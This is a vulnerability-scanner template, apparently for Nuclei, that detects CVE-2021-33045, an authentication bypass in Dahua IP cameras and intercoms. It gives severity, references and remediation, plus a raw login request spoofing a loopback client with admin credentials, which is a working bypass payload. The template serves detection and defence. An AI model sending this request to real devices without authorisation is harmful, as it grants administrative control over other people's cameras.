id: CVE-2021-33045 info: name: Dahua IPC/VTH/VTO - Authentication Bypass author: phantomowl severity: critical description: | The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. impact: | Unauthenticated attackers can bypass device authentication by constructing malicious login packets, gaining full administrative access to Dahua IPC/VTH/VTO devices. remediation: | Apply firmware updates provided by Dahua to address the authentication bypass vulnerability. reference: - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/aboutUs/trustedCenter/details/582 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33045 cwe-id: CWE-287 epss-score: 0.94171 epss-percentile: 0.9992 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity product: ipc-hum7xxx_firmware tags: cve,cve2021,dahua,auth-bypass,seclists,kev,vkev,vuln http: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 } matchers-condition: and matchers: - type: word part: body words: - '"session":' - '"result":true' - '"keepAliveInterval":' condition: and - type: status status: - 200 # digest: 4a0a004730450221008005e515f616e57ac5570d2328a16221fa29efd9a01dbfa972ee9041c8a40fe502206e7ed0fc2b00a7a97ecc468b66629b74bd072aae4d9e7b8509810d3b511cac96:922c64590222798bb761d5b6d8e72950